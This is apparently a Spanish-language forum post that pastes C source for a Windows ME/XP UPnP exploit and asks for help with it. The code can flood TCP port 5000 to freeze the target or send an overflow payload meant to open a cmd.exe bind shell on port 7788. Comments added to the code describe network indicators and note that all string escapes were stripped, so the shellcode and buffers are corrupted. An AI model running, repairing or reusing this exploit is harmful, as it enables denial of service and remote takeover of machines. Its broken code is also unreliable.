Este es el código susodicho:
/*
* WinME/XP UPNP dos & overflow
*
* Run: ./XPloit host <option>
*
* Windows runs the "Universal Plug and Play technology" service
* on port 5000. In the future this will allow for seamless
* connectivity of various devices such as a printer.
* This service has a DoS and a buffer overflow that I exploit here.
*
* PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
*
* Author: Gabriel Maggiotti
* Email:
[email protected]
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
/************************************************** *************************/
/*
 * Entry point of a 2001-era proof-of-concept against the Windows ME/XP
 * UPnP service on TCP port 5000 (see the file header); kept for analysis.
 *
 *   argv[1]  host name or address of the target
 *   argv[2]  mode: "-f" opens FREEZE (512) connections and sends the
 *            2-byte string "XP" on each; "-e" opens one connection and
 *            sends `request`, a filler run + jump stub + payload.
 *            strstr() is used, so the option is matched as a substring
 *            anywhere in argv[2]; if both match, "-e" wins (checked last).
 *
 * Returns 0 after closing the sockets.  Exits with status 1 on bad usage,
 * name-resolution, socket() or connect() failure, and (inconsistently)
 * with status 0 on send() failure.
 *
 * Notes for a defender reading this code:
 *   - On the wire: TCP connections to port 5000 carrying the literal "XP"
 *     (512 of them from one source in -f mode) or a long run of 0x43 bytes
 *     (NOP, "inc ebx") followed by binary data in -e mode.
 *   - The affected Windows versions are long out of support; the generic
 *     control is not exposing SSDP/UPnP (TCP 5000) to untrusted networks.
 *   - Every backslash has been lost from the string literals as posted
 *     ("x90" is three ASCII characters here, "n" and "rnrn" stand where
 *     line terminators belonged), so the program does not build what the
 *     header describes and it overruns its own execode[] (see strcat below).
 *   - num_socks, send_buffer and bindport are read without ever having been
 *     assigned on some or all paths: undefined behaviour.
 */
int main(int argc,char *argv[])
{
int sockfd[MAX];                     /* one descriptor per connection, at most MAX (10000) */
char sendXP[]="XP";                  /* -f payload: two bytes per connection */
char jmpcode[281], execode[840],request[2048];
char *send_buffer;                   /* points at sendXP or request; unset if neither option matched */
int num_socks;                       /* FREEZE for -f, 1 for -e; unset otherwise */
int bindport;                        /* never assigned before it is read in the -e branch */
int i;
int port;                            /* unused (the PORT macro is used instead) */
/* Payload the header attributes to isno (a bind shell on port 7788, per
 * the header).  As posted the escapes are corrupted: each "xHH" is plain
 * text, so this literal is 2412 characters, not the 804 bytes the
 * 16-per-line layout suggests was intended. */
unsigned char shellcode[] =
"x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90"
"x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa"
"x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36"
"x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97"
"x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14"
"x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2"
"x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14"
"x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5"
"xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1"
"xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16"
"xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68"
"x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1"
"x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94"
"x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4"
"x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68"
"x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57"
"x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4"
"x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4"
"x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5"
"xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68"
"xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67"
"xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1"
"x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf"
"x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab"
"x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0"
"xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4"
"x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0"
"x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56"
"x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7"
"xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57"
"xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4"
"x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f"
"xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7"
"xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68"
"xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f"
"x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75"
"x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0"
"xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5"
"xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2"
"x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6"
"x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97"
"xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc"
"xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb"
"xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97"
"xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2"
"xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4"
"xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97"
"xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2"
"xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97"
"x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97"
"x68x68x68x68";
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=3)
{
/* The trailing "n" in these strings is a stripped newline escape, so the
 * three usage lines print run together on one line. */
fprintf(stderr,"usage:%s <hostname> <command>n",argv[0]);
fprintf(stderr,"-f freeze the machine.n");
fprintf(stderr,"-e exploit.n");
exit(1);
}
if(strstr(argv[2],"-f")) {
num_socks=FREEZE;
send_buffer=sendXP;
printf("Usando la opcion -f:\n");
}
if(strstr(argv[2],"-e")) {
printf("Usando la opcion -e:\n");
num_socks=1;
send_buffer=request;
/* bindport has no value yet: XOR of an indeterminate int (undefined
 * behaviour).  Its two low bytes are then written into the payload at
 * fixed offsets. */
bindport^=0x9797;
shellcode[778]= (bindport) & 0xff;
shellcode[779]= (bindport >> 8) & 0xff;
printf("paso 1");                    /* progress marker; no newline, so it may stay buffered until exit */
/* jmpcode: 268 filler bytes (NOP = 0x43), four fixed bytes the page does
 * not describe, four 0x90, the "jmp [ebx+0x64]" stub named below, one
 * more 0x90 and a NUL so the array can be passed to snprintf as %s. */
for(i = 0; i < 268; i++)
jmpcode[i] = (char)NOP;
jmpcode[268] = (char)0x4d;
jmpcode[269] = (char)0x3f;
jmpcode[270] = (char)0xe3;
jmpcode[271] = (char)0x77;
jmpcode[272] = (char)0x90;
jmpcode[273] = (char)0x90;
jmpcode[274] = (char)0x90;
jmpcode[275] = (char)0x90;
//jmp [ebx+0x64], jump to execute shellcode
jmpcode[276] = (char)0xff;
jmpcode[277] = (char)0x63;
jmpcode[278] = (char)0x64;
jmpcode[279] = (char)0x90;
jmpcode[280] = (char)0x00;
printf("paso 2");
/* execode: 32 filler bytes, NUL-terminated so strcat appends after them.
 * strcat performs no bounds check: the 2412-character literal above plus
 * the 32 filler bytes overruns execode[840] on this program's own stack.
 * shellcode is unsigned char[], so the call also mismatches strcat's
 * const char * parameter (a -Wpointer-sign warning). */
for(i = 0; i < 32; i++)
execode[i] = (char)NOP;
execode[32]=(char)0x00;
strcat(execode, shellcode);
printf("paso 3");
/* Bounded and always NUL-terminated, but truncation is silent: anything
 * past 2047 bytes is dropped.  The "rnrn" suffix is another stripped
 * escape sequence, like the "n" in the usage text. */
snprintf(request, 2048, "%s%srnrn", jmpcode, execode);
printf("FIN");
}
/* gethostbyname() is obsolete (getaddrinfo is its replacement) and does
 * not set errno on failure, so perror() prints a misleading message here;
 * h_errno/hstrerror() would report the real cause. */
if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
/************************************************** *************************/
/* All sockets are created before any is connected.  In -f mode that is 512
 * descriptors, which may exceed the per-process descriptor limit; socket()
 * then fails (EMFILE) and the program exits.  Descriptors opened so far are
 * not closed on the early-exit paths; process exit reclaims them. */
for(i=0; i<num_socks;i++)
if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);  /* h_addr is h_addr_list[0]: first resolved address */
bzero(&(their_addr.sin_zero),8);                      /* legacy; memset is the portable form */
for(i=0; i<num_socks;i++)
if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}
/* strlen() sends up to the first NUL: 2 bytes of "XP" per connection in -f
 * mode.  A short send() is not detected, and failure exits with status 0,
 * unlike the other error paths. */
for(i=0; i<num_socks;i++)
if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
{
perror("send");
exit(0);
}
for(i=0; i<num_socks;i++)
close(sockfd[i]);
return 0;
}
Espero que puedas ayudarme.